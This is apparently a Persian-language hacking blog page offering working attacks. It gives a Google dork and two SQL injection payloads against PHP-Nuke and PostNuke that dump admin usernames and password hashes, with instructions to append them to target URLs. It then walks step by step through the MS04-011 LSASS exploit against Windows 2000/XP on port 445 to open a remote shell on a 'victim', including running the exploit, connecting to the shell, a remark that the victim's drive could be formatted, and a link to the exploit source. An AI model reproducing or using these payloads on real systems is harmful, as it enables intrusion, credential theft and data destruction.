| تبليغات | X |
|
هک کرک بوت آموزش
|
||
|
دانلود هک کرک آموزش و.......... |
چند روزی است باگ مربوط به پورتال php nuke پیدا شده من drok ان در گوگل را به همراه اکسپلویت برای استفاده شما میگذارم.
google dork: allinurl: modules-php-op-modload "req view_cat"
اینم اکسپلویت1
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201
اکسپلویت 2
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201
شما فقط کافیه اکسپلویت کپی و در انتهای سایت هدف قرار دهید.
مثال:
www.site.com/modules.php?op=modload&name=books&file=index&req=view_cat&cid=Xpl
که به جای xpl باید اکسپلویت را قرار دهید.
مشاهده باگ درmilw0rm
دو تا کرکر هم براتون میذارم یکیش همراه فیلم اموزشی هست و یکی دیگه هم تو لینک زیر هست ::
خوب همونطور که میدونید پسورد های هش شده این پرتال ها خیلی بد کرک میشن و ممکنه که چند ساعتی طول بکشن .
اما من فقط جوابه اقا پویان
رو بگم که اینگار عجله دارن :: در جوابه ایشون باید بگم که شما اگه
میتونید همه اون تروجان ها یا فایل هایی که برای هک کردن ایدی و وبلاگ هست
رو اپلود کن بعد لینک اون ها رو به من بده . تا ببینم میتونم برات کاری
کنم یا نه . موفق باشی .
خوب دوستان ببخشید اینقدر زود میخام برم . شرمنده.
فعلا بای تا های
مطلبي
كه در اينجا ميخوانيد يكمي پيچيده است بنابراين اصلا نگران نباشيد گام به
گام با اين متن پيش برويد سعي ميكنم خيلي ساده عنوان كنم اصلا نگران نباشيد
خلاصه
كاري كه ما ميكنيم اين است كه ما با كارهاي زير ميخواهيم به ويندوز 2000
يا ايكس پي حمله كنيم از بيرون دستگاه بدون اينكه به قرباني فايلي بديم
اجرا كنه يا هر ارتباط ديگري با قرباني داشته باشيم يعني ميخوايم خيلي
حرفه اي نه مثل اين هكر هاي تازه كار كه تروجان ميدن به مردم خيلي حرفه اي
خودمان ميخوايم يك پورت روي دستگاه قرباني باز كنيم بدون اينكه حتي يك
كلمه هم با قرباني حرف بزنيم خوب حالا كه فهميديد چيكار ميخوام بكنيم من
يكبار ديگه هم خلاصه بگم يك اي پي انتخاب ميكنيد و بعد هكش ميكنيد اولين
كاري كه ميكنيم اين است كه اي پي مورد نظر يا همان قرباني را براي باز
بودن پورت 445 امتحان ميكنيم
Start->run->CMD
را براي باز كردن يك صفحه كامند پرومت بزنيد و بعد با دستور
telnet ip 445
امتحان
ميكنيم كه ايا پورت 445 باز است يا نه البته شما اگر حرفه اي هستيد حتما
مثل هكر هاي حرفه اي براي اين كارها يك برنامه خاص را استفاده ميكني بنا
به سليقه خودتان كه از چه برنامه اي خوشتان مياد ولي در اينجا از دستوراتي
استفاده ميكنيم كه هر كسي خواست اين كار را انجام بدهد نياز به برنامه
خاصي نداشته باشه و با كمترين امكانات ميخوايم به نتيجه برسيم
خوب
توجه كنيد به جا اي پي در دستور بالا بايد اي پي قرباني را وارد كنيد و
اگر اين دستور را وارد كرديد و اتصال برقرار شد يعني پورت 445 باز است پس
گام اول را برداشتيد و اگر اتصال برقرار نشد و پيغام خطا دريافت كرديد
قرباني شما به اين نوع حمله نفوذ پذير نيست
خوب
حالا به گام دوم ميرويم در زير كد هاي حمله به اين پورت را مشاهده ميكنيد
اين كدها را بايد كامپايل بفرمائيد و فايل اجرايي كه بدست مي اوريد را
بصورت زير استفاده ميكنيد
expl
در خط بالا طرز استفاده به اين ترتيب است اولين كلمه expl نام فايل اجرايي است كه بعد از كامپايل ايجاد كرديد target يك
عدد يك رقمي است كه مقدار 0 براي ويندوز ايكس پي است و مقدار 1و2 براي
ويندوز 2000 است در اخر اين نوشته طرز تشخيص اينكه كدام عدد را استفاده
كنيد يعني از كجا بفهميد قرباني ويندوز ايكس پي است كه 0 بزنيد يا قرباني
ويندوز 2000 است كه 1 يا 2 بزنيد را ميخوانيد
victim ip همان اي پي قرباني شما است كه پورت 445 ان باز بود
binport شماره پورتي است كه ميخواهيد روي دستگاه قرباني براي شما باز بشود و به ان پورت وصل بشويد و قرباني را هك كنيد
option يك دستور است كه در ادامه تك دستور اين برنامه را توضيح ميدهم
خوب
دوست من كار بسيار ساده است فرض كنيد اي پي قرباني من 217.0.0.1 است و من
طبق ان چيزهايي كه بالا گفتم اين كارهاي را به تريتب انجام ميدهدم
1- Start --> Run --> CMD
2- Telnet 217.0.0.1 445
3- اگر وصل شد از برنامه حمله كه قبلا كامپال كردم و الان اماده استفاده است استفاده ميكنم
4- پنجره قبلي را كه در 2 دستور قبل باز كردم ميبندم
5- Start->Run->CMD
6-expl.exe 0 217.0.0.1 24745
----بعد از اينكه دستور خط 6 را زدنيد اين نوشته ها را مشاهده ميكنيد----
* [*] Target: IP: 217.0.0.1: OS: winXP [universal] lsass.exe
* [*] Connecting to 217.0.0.1:445 ... OK
* [*] Attacking ... OK
7-حمله
انجام شد و پورت مورد نظر شما كه در خط شماره 6 من شماره پورت 24745 را
انتخاب كردم الان باز شده تا ما وارد دستگاه قرباني بشويم
8-Start-->Run-->CMD
9-telnet 217.0.0.1 24745
10-به احتمال 95 درصد شما موفق شديد دستگاه قرباني را هك كنيد و اين خطوط را مشاهده خواهيد كرد
* Microsoft windows XP [Version 5.00.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\WINNT\system32>
11- دوست من در اين جا شما هر دستوري بزنيد روي دستگاه قرباني اجرا ميشود مثل اگر بزنيد format C: مي توانيد هارد قرباني را فرمت كنيد
ولي توجه كنيد يك هكر در اوج قدرت دست به خرابكاري نميزنه !!! پس هر كاري خواستيد بكنيد ولي خرابكاري نه !!!
و
اما چطوري تشخيص بدهيد كه دستگاه قرباني شما ويندوز 2000 است كه از عدد 1
يا 2 استفاده كنيد يا ويندوز ايكس پي هست كه از عدد0 استفاده كنيد ؟ شما
كافي است كه همان دستور بالا را كه براي حمله استفاده مكنيد بزنيد و فقط
به اخرش -t اضافه كنيد يعني اينطوري
expl 0 217.0.0.1 24745 -t
بعد از زدن اين دستور برنامه به شما نسخه ويندوز را اعلام ميكند اگر نسخه ويندوز را winnt 5.0اعلام كرد يعني ويندوز 2000 است و شما عدد 1 يا 2 استفاده كنيد و اگر winnt 5.1 را اعلام كرد ويندوز ايكس پي است
اميدوارم
كه مطلب بالا مورد استفاده شما قرار گرفته باشد توجه كنيد براي اينكه همه
بتوانند اين مطلب را استفاده كنند مجبور شدم كه خيلي جاها را ساده كنم ولي
در سورس اصلي برنامه ميتوانيد به اصل دستور عمل ها پي ببريد .
براي دريافت کد برنامه به زبان سي اينجا کليک کنيد
ادرس : http://downloads.securityfocus.com/vulnerabilities/exploits/HOD-ms04011-lsasrv-expl.c
|
